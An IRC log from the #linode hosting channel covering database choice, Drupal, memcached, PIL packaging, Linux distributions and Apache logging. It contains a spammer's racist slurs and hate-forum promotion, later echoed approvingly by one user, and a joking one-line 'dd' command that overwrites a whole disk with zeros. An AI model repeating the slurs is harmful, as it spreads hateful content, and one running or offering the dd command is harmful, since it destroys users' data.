21:44<EugeneKay>jed - if it has been stricken, fuck Sun. They can keep their hands out of my systems. :v
21:45<HoopyCat>EugeneKay: i believe you mean s/Sun/Oracle/g
21:45<EugeneKay>All of the above
21:45<HoopyCat>EugeneKay: apt-get purge mysql-common
21:45<Obsidian|server>long live postgres
21:45<Obsidian|server>down with oracle
21:45<EugeneKay>bash: apt-get: command not found
21:45<Obsidian|server>etc. etc.
21:45<HoopyCat>EugeneKay: you're already infected
21:45-!-karanlyons [~karanlyon@c-66-31-201-37.hsd1.ma.comcast.net] has joined #linode
21:46<Obsidian|server>EugeneKay: yum remove mysql?
21:46<EugeneKay>If there was a mariadb package that I didn't have to make myself, I would.
21:46<Obsidian|server>honestly, I see no potential in mariadb
21:47<Obsidian|server>was talking with Sam about when he visited their oscon booth. Plans for the future, to develop and innovate? ...
21:47<Obsidian|server>Deafening silence
21:47<EugeneKay>Laugh.
21:47<HoopyCat>i want to go postgresql bad, but i don't want to support two SQL-speakers and we still have vbulletin and wordpress and coldfusion and stuff that i don't even want to think about
21:48<Obsidian|server>HoopyCat: I know, it's ridiculous how hardcoded so many of those proprietary web apps are
21:48<karanlyons>HoopyCat: I'm currently running postgresql for all my stuff, and mysql for two apps I really like.
21:48<karanlyons>It's not terrible, but it's not ideal
21:48<Obsidian|server>same.
21:48<Obsidian|server>MySQL running for my TF2 server
21:48<Obsidian|server>Postgres running for anything web-end
21:48<karanlyons>TF2 needs mySQL?
21:48<squircle>whaaa?
21:48<EugeneKay>That was my question
21:48<HoopyCat>Obsidian|server: django is easy like sunday morning... PHP is, gaaaaaaagh.
21:48<Obsidian|server>No, but the stats plugin that I use does
21:48<karanlyons><3 Django
21:48<squircle>aah
21:48<tonyyarusso>I've been told by reasonably reliable sources that Drupal's postgres support still leaves something to be desired, which makes me sad. It's definitely improving though.
21:48<karanlyons>Ah.
21:48<Solver>have you guys given much thought to the varioud mysql forks?
21:48-!-lunks [~lunks@189.6.143.177] has quit [Quit: lunks]
21:48<EugeneKay>tonyyarusso - it's nonexistent in Drupal 7
21:49<Solver>eg drizzle
21:49<karanlyons>tonyyarusso: My experience is that all of Drupal is a world of hurt.
21:49<Daevien>tonyyarusso: drupals support of most things leaves much to be desired :p
21:49<EugeneKay>Drupal is better than, say, gramma writing somethign from scratch.
21:49<tonyyarusso>eh? I like Drupal generally.
21:49<HoopyCat>karanlyons: rocwiki.org "came with" postgresql when i inherited it... i still know absolutely bupkis about tuning and maintaining it
21:49<tonyyarusso>Solver: Various? I'm only aware of MariaDB.
21:49<HoopyCat>karanlyons: and as the years roll by, the more i realize that's not a bad thing :-)
21:50<karanlyons>HoopyCat: Postgresql is pretty great out of the box, honestly.
21:50<Daevien>HoopyCat: you can always go torture yourself with oracle if you are that bored
21:50<EugeneKay>Oracle: because $
21:50<tonyyarusso>EugeneKay: What do you mean re D7 exactly?
21:50<Solver>tonyyarusso: Drizzle. pretty sure there are others
21:50<HoopyCat>Daevien: i've got six mysql servers to keep running, lordy am i not bored
21:51-!-sam350 [~sam350@c-98-207-99-240.hsd1.ca.comcast.net] has joined #linode
21:51<karanlyons>That's gotta be fun!
21:51<Daevien>HoopyCat: i hated dealign with oracle db servers and we even had someone oracle trained doign the majority of it :p
21:51<EugeneKay>tonyyarusso - a *lot* of modules don't play nicely with postgres in D7.
21:51<HoopyCat>so apparently it does a DNS PTR lookup for every incoming connection!
21:51<tonyyarusso>EugeneKay: bother
21:52<@jed>HoopyCat: http://rocwiki.org/System_Info = boom
21:52<p3rsist>postgreSQL is farrrrr better than MySQL... its sad that its not as popular...
21:52<tonyyarusso>EugeneKay: As I understand it, the core itself supports it better due to a new abstraction layer, but the modules aren't making proper use of it yet.
21:52<EugeneKay>Exactly that.
21:52<Daevien>!d
21:52<+linbot>Daevien: Now 49% full (about 7 hours remaining). Last emptied yesterday at 13:55 UTC, last full yesterday at 13:10 UTC after running for 19.6 hours.
21:52<EugeneKay>Also it gets a lot less usage and testing
21:52<HoopyCat>i learned this today, whilst vbulletin (which opens a new connection for every request) was getting exercised by eastern european hotmail users with exciting offers... i think i broke slicehost's STL-A resolvers before i figured it out
21:53<HoopyCat>jed: yeah, my code doesn't handle missing memcached instances gracefully. (which reminds me...)
21:53<HoopyCat>jed: the unavailable VPS stats are a linode problem, of course ;-)
21:53<@jed>HUH WHAT
21:53*jed shifts blame and vanishes
21:53-!-MrPPS [~quassel@canyouget.in] has joined #linode
21:53<HoopyCat>jed: it's using the undocumented thing to pull stats
21:54<Daevien>jed: thats your holwe job isnt it?
21:54<Daevien>er whole
21:54<@jed>my whole job is nodebalancer, now
21:54<Daevien>really? didn't think it would catch on that big so quick
21:54<Daevien>good for you guys that it has though
21:55<HoopyCat>oh right, it's a wiki, i can just comment shit out
21:55*Obsidian|server backstabs jed
21:55*Praefectus facestabs Obsidian|server
21:56<@jed>Daevien: keeping up with it is a full-time job, it's based on diva software
21:56<karanlyons>Wait, what's going wrong?
21:56<@jed>I need to follow it around with fiji water and feed its dog and shit
21:56<Daevien>jed: we still talkign abotu nodebalancer or caker?
21:56<bob2>varnish isn't marriage material
21:57<HoopyCat>jed: https://rocwiki.org/System_Info is more better now. also, holy fuck, having a missing memcached totally destroys pageload time
21:57<@jed>I wonder if I'll get wi-fi on the roof
21:57-!-seanh-ansca [~Adium@173-8-133-236-SFBA.hfc.comcastbusiness.net] has quit [Ping timeout: 480 seconds]
21:57*Daevien slips Praefectus some money to push jed off
21:58<karanlyons>HoopyCat: Infoicon.png took 3.29s for a completed request.
21:58*Praefectus is not at hostingcon
21:58<karanlyons>Which is funny because in the end it was cached locally.
21:58<@jed>sounds suspiciously like a 3s timeout followed by a .29s delivery
21:58<karanlyons>Doesn't it?
21:58<Daevien>Praefectus: ah, needed a break from jed?
21:58<@jed>would fit what he's saying, anyway
21:58<Obsidian|server>Praefectus: hey hey now that's my job
21:59<Obsidian|server>Praefectus: especially if you're playing scout
21:59<karanlyons>HoopyCat: Actually, every time I reload I get 3s of timeout for some request for the page.
21:59<Obsidian|server>facestabbing scouts is fun
21:59<Daevien>HoopyCat: eww, avg response time 792ms?
21:59<@jed>portcamping is more fun
21:59<mikegrb_>lulz
21:59<@Praefectus>Daevien: no, jed is on the other side of the country, it would be a bit hard for me to push him off the roof lol
21:59<HoopyCat>alright alright alright, i'll put the fire out
22:00<mikegrb_>lulz
22:00<karanlyons>mikegrb_ is a bot, right? He only ever says lulz, and only after someone else says lol.
22:00<karanlyons>See?
22:00<mikegrb_>lulz
22:00<Kyhwana_>lol
22:00<Daevien>Praefectus: i'm sure you coudl find a way.. offer someone there free hosting for a year or something for an unfortunate accident
22:00<Daevien>karanlyons: he's not a bot though. real person with some triggers
22:00<@jed>taunt kills take all, though: http://www.youtube.com/watch?v=WOK8BU5Myo4
22:00<Daevien>ie: hi mike, want some cake?
22:00<karanlyons>What a strange thing for a man to do.
22:00<Daevien>hmm, mike removed that one? :p
22:01<xt3mp0r>bacon
22:01<Obsidian|server>mikegrb_: there's porn in the freezer
22:01<Daevien>must have hit his flood control or he's there and jsut screwing with people
22:01<HoopyCat>ok, i turned the speed back up
22:01-!-omy [~411cb997@chat.linode.com] has quit [Quit: CGI:IRC]
22:01<Daevien>in any event, it is a real person. but he only speaks once in a while
22:01<karanlyons>HoopyCat: I'm not getting timeouts anymore.
22:01<mikegrb_>mmm bacon
22:01<Obsidian|server>xt3mp0r: is that offer of bacon still valid
22:02<HoopyCat>karanlyons: timeouts!! wtf
22:02<Obsidian|server>oh he must have been lagging the--
22:02-!-Prottoz [~exwuriit@189-041-197-002.xd-dynamic.ctbcnetsuper.com.br] has quit [Read error: Connection reset by peer]
22:02<karanlyons>HoopyCat: I said I'm *not* anymore.
22:02<karanlyons>So, yay?
22:02<HoopyCat>oh, the 3-second pause, not the zomg-throwing-error-timeout
22:02-!-Prottoz [~exwuriit@189-041-197-002.xd-dynamic.ctbcnetsuper.com.br] has joined #linode
22:02<xt3mp0r>Obsidian|server: nah, i ate it xD
22:02<karanlyons>HoopyCat: Yeah, not a full blown, server shat itself timeout.
22:02<dwfreed>heh, mike's using irssi
22:02-!-wkl [~wkl@61.135.152.207] has joined #linode
22:02<Obsidian|server>xt3mp0r: you have doomed yourself to a painful death
22:03<HoopyCat>karanlyons: octothrope ftw
22:03<Daevien>dwfreed: mike can also kick your ass, i won't poke and prod him too much :p
22:03<xt3mp0r>Obsidian|server: wait, am i alive?
22:03<Obsidian|server>you'll wish you were
22:03<karanlyons>HoopyCat: You commented something out?
22:03<HoopyCat>karanlyons: nod, broken memcached instance
22:04<karanlyons>Oh no, memcached died!
22:04<Daevien>HoopyCat: well unbreak it!
22:05-!-PooBuck [~PooBuck@189.214.159.6.cable.dyn.cableonline.com.mx] has joined #linode
22:05<karanlyons>Can you perform percussive maintenance over ssh?
22:05<PooBuck>Tired of niggers?
22:05<PooBuck>Sick of their monkeyshines?
22:05<PooBuck>We are too!
22:05<karanlyons>What the fuck?
22:05<PooBuck>Join Chimpout Forum!
22:05<bob2>jed: yo
22:05<PooBuck>c h i m p o u t . c o m / f o r u m
22:05<squircle>i foresee a banhammer
22:05*Daevien prods mwalling
22:05<HoopyCat>mwalling: yo
22:05-!-mode/#linode [+b *!*PooBuck@*.214.159.6.cable.dyn.cableonline.com.mx] by jed
22:05-!-PooBuck was kicked from #linode by jed [sup]
22:05<bob2>thx
22:05<karanlyons>Well that was nice.
22:05<squircle>never seen that before
22:06<karanlyons>Me neither.
22:06<dwfreed>heh, i just tried to use equery in Debian
22:06<HoopyCat>been awhile, that's for sure
22:06<karanlyons>It was sort of like a driveby ad in the metaverse.
22:06-!-jamescollins [~jamescoll@202.161.22.252] has quit [Read error: Connection reset by peer]
22:06-!-jamescollins [~jamescoll@202.161.22.252] has joined #linode
22:10<apsqwla>karanlyons, finally a good internet role model
22:10<karanlyons>Me? A role model?
22:11<apsqwla>no PooBuck
22:11<karanlyons>Ah, yes. He's the voice of our generation.
22:11<karanlyons>If our generation was extremely racist.
22:11<apsqwla>karanlyons, dont let the hate die
22:12<HoopyCat>purity of essence
22:13<apsqwla>i actually quite like their monkeyshines
22:14-!-jamescollins [~jamescoll@202.161.22.252] has quit [Ping timeout: 480 seconds]
22:16-!-DarkG [~DG@host86-175-32-206.wlms-broadband.com] has quit [Ping timeout: 480 seconds]
22:16-!-zeade [~Adium@c-98-248-222-200.hsd1.ca.comcast.net] has quit [Quit: Leaving.]
22:18-!-akerl [~Les@pool-70-109-61-224.clppva.fios.verizon.net] has joined #linode
22:18-!-heliostatic [~heliostat@c-71-204-188-68.hsd1.ca.comcast.net] has joined #linode
22:18<karanlyons>Random question, but does there exist a PIL package that actually installs PIL and all its dependencies properly? I've always done the whole thing from source.
22:19<HoopyCat>karanlyons: i usually just 'pip install PIL' within the virtualenv that needs it, i think
22:19-!-karstensrage [~karstensr@c-67-174-201-143.hsd1.ca.comcast.net] has joined #linode
22:19<karanlyons>HoopyCat: Does come with libjpeg, FreeType, and LittleCMS?
22:20*karanlyons never thought to use pip to install PIL.
22:20<HoopyCat>karanlyons: i don't know, i don't know, and i don't know ;-)
22:20<karanlyons>Haha
22:20<karanlyons>I'll just spin up an env and check it out.
22:20<Daevien>but you know everything HoopyCat !
22:20<purrdeta>hmm nginx... :D
22:20-!-MikeH [~mike@86.63.17.141] has quit [Read error: Connection reset by peer]
22:21<karanlyons>purrdeta: It's nice, isn't it?
22:21<purrdeta>indeed. php-fpm seems to be trying to eat my server though. time to tune I suppose
22:22<Daevien>yeah default is usually like 15 fpm processes which is a bit much
22:22<karanlyons>HoopyCat: Looks like the answer is no. You'll need to compile all the C dependencies (libjpeg, libz, FreeType, and LittleCMS) yourself.
22:22-!-TIBS011 [lemfpomwe@host-92-20-154-71.as13285.net] has quit []
22:22<karanlyons>Daevien: You set a minimum for php-fpm, and it'll spawn more procs if needed, correct?
22:23-!-DarkG [~DG@host86-175-32-206.wlms-broadband.com] has joined #linode
22:24<purrdeta>You set a minimum ad max. I set my min to 5 and max to 20.
22:24-!-vraa [~vraa@c-76-30-144-32.hsd1.tx.comcast.net] has quit [Quit: Leaving]
22:24<purrdeta>I don't see it needing more than that.
22:24<Daevien>i think there is initial coutn as well purrdeta
22:25<purrdeta>yup
22:25<HoopyCat>karanlyons: i don't think we do too much with PIL, but it does appear to be installed, somehow
22:25<Daevien>so you initial could be higher and let it die down to lower if they arent needed for example
22:25<bob2>karanlyons: sure, your OS has one
22:25<purrdeta>I just discovered one of my wordpress addons doesn't approve of nginx :P
22:25<bob2>PIL itself is ancient and terribly packaged
22:25<purrdeta>or something
22:25<bob2>however some enterprising zope dude redid it
22:25<karanlyons>HoopyCat: It's happy to install without various dependencies, but it just won't support various file formats associated with them then.
22:26<Daevien>purrdeta: it prob does stuff with htaccess, thats usualyl what complains
22:26<karanlyons>bob2: Ubuntu has a full version, dependencies and all, of PIL?
22:26<bob2>seriously use the ubuntu package
22:26<karanlyons>If this is true, it is awesome.
22:26<bob2>sudo aptitude install python-imaging
22:26<bob2>winner
22:28<@heckman>winner
22:28<karanlyons>Holy crap, it does!
22:28<+linbot>chicken dinner
22:28<karanlyons>This is one of the best things to happen to me today.
22:29<@heckman>karanlyons: you need to get out more. :p
22:29-!-heliostatic [~heliostat@c-71-204-188-68.hsd1.ca.comcast.net] has quit [Remote host closed the connection]
22:29<karanlyons>heckman: Just today, not any span of time longer than that :P
22:29<Musfuut>Is ubuntu a poor choice for a server? Some linux "expert" tried telling me yesterday that ubuntu is no good for non-hobby stuff. I'm going to keep using ubuntu regardless though :3
22:29-!-sam350 [~sam350@c-98-207-99-240.hsd1.ca.comcast.net] has quit [Ping timeout: 480 seconds]
22:30<squircle><3 ubuntu
22:30<bob2>ubuntu LTS is a fine choice
22:30<karanlyons>It doesn't really matter at the level most of us are at.
22:30<randallman>Musfuut, ubuntu shines - just not in the ENTERPRISE space.
22:30<Musfuut>enterprise would be?
22:30<randallman>Musfuut: example - running oracle database or EMC documentum
22:30<bob2>randallman: amitz isn't here
22:30<randallman>mainly because of support.
22:30<randallman>bob2, and? :P
22:30<randallman>I am!
22:30<@Praefectus>bob2: randallman is filling in for amitz
22:30<rnowak>amitznix is the only good choice for enterprise
22:30<bob2>Praefectus: ahhh
22:31<mikegrb_>lulz
22:31<Musfuut>lol
22:31<bob2>didn't realsie they had a trollshare arrangement going on
22:31<randallman>troll?
22:31<Musfuut>Which distro would be best for those, is red hat still the prize pony or did someone else take lead, I've been out of touch
22:31<randallman>the man asked a legitimate question, and got a truthful answer
22:31<randallman>no, ubuntu is the prize pony :)
22:31<Musfuut>Hehehe
22:32<randallman>RedHat has 2 flavors now, fedora (newer... fresher) and RHEL (enterprise/COTS supported)
22:32<@heckman>If I had to run Ubuntu on a server I'd only go with the LTS. However, Debian is my weapon of choice.
22:32<randallman>If you're looking for availablity of packages, availability and quality of community support, and fresh installs - ubuntu LTS
22:32<@heckman>!debian
22:32<+linbot>Today is Debian Appreciation Day! \o/
22:33<randallman>but I dont want to start a distro war between ubuntu and debian :)
22:33<Musfuut>ok, sounds like I made the right choice in picking ubuntu (it is lts and up to date) :)
22:33<squircle>is every day Debian Appreciation Day?
22:33<@heckman>!botsnack
22:33<+linbot>thanks, heckman!
22:33<rnowak>yes, yes it is
22:33<mikegrb_>lulz
22:33<Musfuut>lol sorry sorry, yes please do not fight guys
22:33<randallman>lts face it, without debian - ubuntu is not :)
22:33<randallman>or at least was
22:33<squircle>you make a completely valid point
22:33<karanlyons>heckman: Why debian over ubuntu? (Genuinely curious. Not arguing.)
22:33<squircle>HERE WE GO
22:34<bob2>my rationale is i'm too old to learn new things
22:34<karanlyons>Please no flame war, please no flamewar, please no flamewar.
22:34<randallman>I prefer RHEL because it makes me money :)
22:34<@heckman>karanlyons: I've had some muck ups with Ubuntu where it completely obliterates itself.
22:34<Obsidian|server>honestly, I hate ubuntu desktop
22:34<rnowak>VIM > EMACS
22:34<Obsidian|server>with a passion.
22:34<rnowak>bring it!
22:34<@heckman>I use Ubuntu/Xubuntu on desktops at hmoe.
22:34<karanlyons>heckman: muck up sounds like an understatement then :P
22:34<@heckman>s/hmoe/home/
22:34<Obsidian|server>I've had ubuntu desktop break SO MANY TIMES
22:34<randallman>and because I need vendors to explain why their software sucks... and they choose to blame the distribution if we dont use RHEL :)
22:34<squircle>karanlyons: I asked that question on my second or third day in #linode and started a huge flame war. (just like you, I was genuinely curious)
22:34<HoopyCat>the only distro that i've never managed to break is urmom
22:34<rnowak>"huge flame war", in here?
22:34<Musfuut>heckman: In a way that a backup can fix things? or like omg it was dead from the start it just pretended to work?
22:34<Daevien>heckman: currently i have ubuntu servers and debian laptops. heh
22:35<Obsidian|server>fedora broke a year in on me
22:35<HoopyCat>ergo, i run urmom in all of my production and staging environments
22:35<karanlyons>squircle: The DNS wildcard thing was another unintentional flame war. Again, I was just genuinely curious.
22:35<bob2>mwalling: poobuck is spamming elsewhere too
22:35<Kyhwana_>randallman: You must use Centos 4.3 with this oldass library and these things with massive security holes! We don't support anything else!
22:35<randallman>dd if=/dev/zero of=/dev/hda bs=1024k = BREAK any distro :)
22:35<@heckman>Musfuut: I mean, rolling back usually work.
22:35<randallman>Kyhwana_: it's not that bad anymore
22:35<Musfuut>cool then, cause I got me backups
22:35<squircle>karanlyons: well that whole three-day resolving-spree was just me being me :P
22:35<randallman>Kyhwana_: although EMC Documentum 6.6 only supports RHEL 5.4
22:35<Obsidian|server>randallman: oooh I know that command, that's fun
22:35<randallman>5.7 is out :)
22:35<HoopyCat>also, i think we can all agree that whichever distro you choose is fine -- ubuntu, debian, whatever -- as long as it isn't centos
22:35<Kyhwana_>randallman: oh, it is.. especially for firmware compilters/testers/etc
22:35<Daevien>HoopyCat: +1
22:35<randallman>Kyhwana_: ok :)
22:35<HoopyCat>afk, deploying onto urmom
22:35<randallman>HoopyCat: that was red, man :)
22:36<Musfuut>Yeah if it isn't something that stopped getting updates years ago it is probably fine
22:36<randallman>CentOS isnt bad - it just has a purpose :)
22:36<Obsidian|server>HoopyCat: no, as long as it isn't OpenLinux
22:36<randallman>Monte vista linux
22:36<Musfuut>Use what makes you happy :) or use whichever pays the bills :)
22:36<rnowak>centos has a purpose now? :p
22:36<randallman>err montavista linux
22:36<randallman>'carrier grade linux' they claim :)
22:36<Daevien>randallman: centos provides the best of 2001!
22:36<Obsidian|server>so what's battleship grade linux then
22:36<randallman>I used it on some not-so-embedded systems
22:36<HoopyCat>Musfuut: +1
22:37<@Praefectus>randallman: do they explain "carrier grade"?
22:37<randallman>Check the website :)
22:37<randallman>http://www.mvista.com
22:37<p3rsist>Hey guys, I found this great answer for iptables :) http://serverfault.com/questions/245711/iptables-tips-tricks ...just wanted to share :)
22:37<randallman>A CGL compliant, high performance, high availability carrier grade Linux designed for next generation multi-core network architectures.
22:37<Obsidian|server>Praefectus: i want to know what's battleship grade linux in comparison
22:37<Obsidian|server>that way I can figure out what is DEATH STAR LINUX
22:37-!-gadams [~IAmMrAwes@static-72-248-178-82.mas.onecommunications.net] has joined #linode
22:37<Obsidian|server>where EVERYTHING DIES
22:37-!-nisstyre [~nisstyre@infocalypse-net.info] has quit [Ping timeout: 480 seconds]
22:37<Daevien>randallman: is it based on slackware? :)
22:37<@Praefectus>Obsidian|server: dont you know? the death star ran on windows, thats why it was so easy to blow up
22:38<p3rsist>Out of curiosity, what do you guys use for server monitoring?
22:38<karanlyons>Fun fact, the deathstar ran Windows NT.
22:38<randallman>Daevien: when I used it, it was RPM based I believe
22:38-!-mathew [~mathew@cpc5-flit3-2-0-cust101.9-1.cable.virginmedia.com] has quit [Quit: Leaving]
22:38<Obsidian|server>Praefectus: I could have sworn it was running BSD
22:38<@Praefectus>nah, bsd is good
22:38<Daevien>randallman: heh i figured it would be. was just joking
22:38<Obsidian|server>Praefectus: and the explosion was caused by a BSD bluescreen
22:38<Musfuut>p3rsist: What sort of monitoring?
22:38<Obsidian|server>i am cursed with bluescreens, when working with bsd
22:38<Obsidian|server>every time.
22:39<randallman>Daevien: YOU MAKEA FUN OF MAH DISTRO! :-)
22:39<gadams>You too?
22:39-!-gawry [~gustavoga@187.126.136.210] has quit [Ping timeout: 480 seconds]
22:39*Praefectus has never gotten a bluescreen on bsd
22:39<Daevien>randallman: what slack or rpm stuff?
22:39<@Praefectus>sooooo you must be doin it wrong
22:39<Obsidian|server>well
22:39<randallman>rpm :-)
22:39<Obsidian|server>when it's the INSTALLER doing it
22:39<Obsidian|server>It's kinda hard to say it's PEBKAC.
22:39<randallman>I've made both rpms and debs... I guess I'd have to say I prefer rpms
22:40<@heckman>I think I'll attempting to tri-boot my Desktop in to Arch Linux this coming weekend.
22:40<Daevien>randallman: i haven't used much for rpm based stuff since like 2006 or so, i just dislike centos for all the ancient packages, it has it's uses. i used it to do asterisk stuff
22:40<Obsidian|server>heckman: have lube hand-- oh wait you said arch linux, not gentoo.
22:40<gadams>I'm going to try boot your mom.
22:40<Musfuut>p3rsist: I use munin for general server monitoring
22:40-!-Knight [~BOSS@snubby.user.oftc.net] has joined #linode
22:40<Musfuut>be back soon
22:40<@heckman>Obsidian|server: Gentoo wouldn't be too bad. My CPU would compile well. I'm just too damn impatient to compile.
22:40<randallman>Daevien: it's amazing how much hate rh-derivatives get because of the age of the packages... Most of them have backported security fixes...
22:41<randallman>Daevien: it's just much of the graphical interface stuff fails
22:41<Obsidian|server>heckman: when the install guide is in chapters, you know you're dealing with something ridiculous
22:41<@heckman>p3rsist: Munin for graphs.
22:41<randallman>Daevien: e.g. adobe air does NOT work on my rhel x86_64 box
22:41-!-petemall [~petemall@99-99-38-103.lightspeed.sntcca.sbcglobal.net] has quit [Quit: petemall]
22:41<randallman>and there's no chrome bins
22:41<@heckman>Obsidian|server: I must say ArchWiki is pretty sexy
22:41<Daevien>randallman: it's not so much teh security. it's that i always end up with some pakcage i have to support that means i have to run a diff version of that one which want saa diff version of that one, etc
22:41<Obsidian|server>link?
22:41<@heckman>randallman: Adobe Air = abandoned on Linux.
22:41<randallman>heckman: was it?
22:41-!-gawry [~gustavoga@187.126.64.102] has joined #linode
22:41<Obsidian|server>heckman: link?
22:41<randallman>heckman: it works on ubuntu :)
22:42<Daevien>http://news.cnet.com/8301-30685_3-20071500-264/adobe-scraps-air-for-linux-focuses-on-mobile/
22:42<randallman>Daevien: it wasnt really made to 'choose your own software'... not REALLY
22:42<Musfuut>heckman: Should I wipe the settings for munin and reinstall it since I migrated or do you think it is smart enough to be monitoring things correctly?
22:42<Daevien>(horrible link, cnet belh)
22:42<@heckman>http://blogs.adobe.com/open/2011/06/focusing-on-the-next-linux-client.html
22:42<randallman>heckman: oh well, fuckem
22:42<Obsidian|server>heckman: link to archwiki
22:42<randallman>heckman: adobe can pound sand - their days are numbered
22:42<Obsidian|server>heckman: cause i am lazy and am halfway into facekeyboarojndawpjadakdawe;lkj
22:42<randallman>heckman: we're already replacing many flex-based grids with JQGrid
22:43<randallman>in our UIs
22:43<@heckman>http://tinyurl.com/3f8h8qx
22:43<randallman>jqgrid + rest > FLEX + blazeDS
22:43<Daevien>randallman: yeah, i just had to deal with chinese programmers, indian/us/other users, etc. so centos drove me nuts at times cause of all the wants of the others
22:43<@heckman>For example: https://wiki.archlinux.org/index.php/Beginners%27_Guide
22:43<Obsidian|server>you know, lmgtfy would work better if I didn't have it 127.0.0.1'd in my hosts file
22:43<Obsidian|server>but
22:43<Obsidian|server>meehhhhh
22:43<Obsidian|server>an--
22:43<Obsidian|server>oh that's nice
22:44-!-zacharyp [~zacharyp@li227-152.members.linode.com] has left #linode []
22:44<Obsidian|server>though the code blocks need larger font sizes
22:44-!-petemall [~petemall@99-99-38-103.lightspeed.sntcca.sbcglobal.net] has joined #linode
22:44<@heckman>I can overlook that as the articles are well written and for the most part clear.
22:45<Obsidian|server>yeah, ctrl+scroll works
22:45<Obsidian|server>though someone needs to be slapped about that to change it
22:45<Obsidian|server>boosting it .2 em would probably work
22:45-!-zeade [~Adium@c-69-181-136-75.hsd1.ca.comcast.net] has joined #linode
22:45<apsqwla>what is 0.0.0.0 in ipv6
22:45<Daevien>apsqwla: www.google.com knows!
22:45-!-Bass10 [~Bass10@c-76-113-194-7.hsd1.mn.comcast.net] has quit [Ping timeout: 480 seconds]
22:45<apsqwla>::1 ?
22:45<Obsidian|server>as long as it uses a decent monospaced font, it would be recognizable and unique from normal text
22:45<randallman>::/0
22:46<apsqwla>::/0 hmm really, i know nothing about ipv6
22:46<Obsidian|server>::1 is localhost isn't it
22:46<Obsidian|server>loopback?
22:46<karanlyons>Isn't ::1 loopback?
22:46<Daevien>apsqwla: you don't know as much as you think about other things either. just a sidenote :)
22:47<randallman>::1 is loopback
22:47*karanlyons is still banging rocks together on IPv4
22:47*Obsidian|server bangs rocks together on making fire
22:47<Obsidian|server>o.O
22:47<karanlyons>Burn yourself?
22:47<akerl>Obsidian|server: Try gasoline. Much more fun
22:48<randallman>self-immolate
22:48<apsqwla>http://www.estoile.com/links/ipv6.pdf
22:48*Obsidian|server lights a bonfire in the Fremont datacenter
22:48<randallman>fwiw, ::/0 means all zeros with 0 bit netmask
22:48<randallman>0000:0000:0000.... just sucks to write :)
22:48-!-smed [~smed@ool-4353493d.dyn.optonline.net] has quit [Read error: Connection reset by peer]
22:49-!-Antwan [~Antwan@adsl-98-77-201-71.mia.bellsouth.net] has joined #linode
22:49<randallman>so its not altogether different from v4 with 0.0.0.0/0
22:49<apsqwla>does 0:0:0 works?
22:49-!-heliostatic [~heliostat@c-71-204-188-68.hsd1.ca.comcast.net] has joined #linode
22:49<Antwan>ubuntu apache question, if I have like 10 sites on a VPS and I see 1 apache process eating way too much CPU. how can I see what its being served
22:49<randallman>0:0:0:0:0:0:0:0/0 would be valid
22:49<randallman>but silly
22:49-!-smed [~smed@ool-4353493d.dyn.optonline.net] has joined #linode
22:49<randallman>and people will slap you :0
22:49<Obsidian|server>Antwan: the log files
22:49-!-gawry [~gustavoga@187.126.64.102] has quit [Ping timeout: 480 seconds]
22:50<Antwan>where can I find those? (sorry newbie)
22:50<Obsidian|server>uh, /var/log/apache2/
22:50<karanlyons>Antwan: /var/log/apache2/
22:50<Obsidian|server>will need auths to read them though
22:50<Obsidian|server>iirc, they're sometimes 600
22:50<karanlyons>Unless you're logged in as root.
22:50<karanlyons>(Protip: Don't do that)
22:51<apsqwla>woot
22:51<apsqwla>3w-9xxx: scsi0: AEN: ERROR (0x04:0x0002): Degraded unit detected:unit=0, port=0.
22:51<Obsidian|server>karanlyons: there are SOME circumstances where sudo su is needed actually
22:51<randallman>http://www.youtube.com/watch?v=mgrarm3Hg-c
22:51<randallman>why sudo su ?
22:51<karanlyons>Obsidian|server: Yeah, but as a general rule you shouldn't be hanging out in your server as root.
22:51<randallman>not sudo -s?
22:52<squircle>Obsidian|server: or sudo -s, sudo -i (never used sudo su(
22:52<randallman>I see people doing sudo su - all the time
22:52<Obsidian|server>randallman: my wireless drivers, for some reason, never install with sudo.
22:52<randallman>and I want to shoot myself in the head with a large caliber bullet
22:52<Antwan>access.log is empty, what do I do?
22:52<Obsidian|server>randallman: they only compile with sudo su.
22:52<Obsidian|server>erm
22:52<Obsidian|server>install.
22:52<randallman>Obsidian|server: really.
22:52<squircle>Obsidian|server: well sudo -i == sudo su
22:52-!-gawry [~gustavoga@187.126.88.190] has joined #linode
22:52<randallman>Obsidian|server: could it be something about the environment?
22:52<karanlyons>Antwan: Are you opening them with sudo?
22:52<Antwan>im on as root
22:52<Obsidian|server>it's unknown, a quirk noted on the ubuntu forums about installing the drivers
22:53<Obsidian|server>hopefully soon, linux 3.0 will go more mainstream (it includes my drivers, FINALLY)
22:53<Antwan>size is 0
22:53-!-logichole [~james@c-98-247-99-60.hsd1.wa.comcast.net] has quit [Ping timeout: 480 seconds]
22:53<Obsidian|server>squircle: yes but that requires reaching for hyphen
22:53<karanlyons>Huh. Did you disable logging?
22:53-!-andrew [~andrew@70.134.98.138] has quit [Quit: Client Quit]
22:53<squircle>Obsidian|server: aah, I see
22:53<Obsidian|server>Antwan: other_vhosts_access.log
22:53<Obsidian|server>ls -la that dir
22:53<karanlyons>squricle: I mean, that's so far from the home row
22:53<Obsidian|server>see what's big
22:54<Antwan>Obsidian}server: Empty as well
22:54<Obsidian|server>...huh.
22:54<Obsidian|server>ls -la the dir, see what files are big.
22:54<karanlyons>Obsidian|server: Maybe logging is disabled?
22:54<apsqwla>Obsidian|server, might be time to compile your own kernel?
22:54<Antwan>access.log.1 but it has things that are very old
22:54<Obsidian|server>strange
22:54<Obsidian|server>maybe logging was disabled at some point..
22:54<Obsidian|server>you'll want to reenable that
22:55<Antwan>how can I do that?
22:55<Daevien>Antwan: check to see you ahvent run otu of diskspace
22:55<Obsidian|server>httpd.conf directives
22:55<Obsidian|server>or apache.conf
22:55<Obsidian|server>whatever you're using
22:55<Antwan>Daevien: How?
22:55<Daevien>df -h
22:55<Daevien>!p
22:55<+linbot>http://p.linode.com <-- paste here, not in the channel
22:55<Daevien>in case you want ot paste stuff, use that btw
22:55<karanlyons>Inb4 channel spam.
22:56<Antwan>Daevien: not full
22:56<Obsidian|server>wow, google
22:56<Obsidian|server>I search for "enable logging virtualhost apache"
22:56-!-pigdude [~tallen@c-69-143-181-131.hsd1.va.comcast.net] has joined #linode
22:56<Obsidian|server>half the results are for disabling logging
22:56<Antwan>haha
22:56<+linbot>New news from forums: Slow Response Times - Unsure Source of Problem in Web Servers and Web App Development <http://forum.linode.com/viewtopic.php?t=7542>
22:56<karanlyons>:D
22:56<Obsidian|server>okay someone else help him
22:56<Obsidian|server>i'm going to bed I can barely keep my eyes open now
22:56<Antwan>thanks for the help :)
22:57<karanlyons>I'd say lsof -p the PID
22:57<Antwan>whats that do
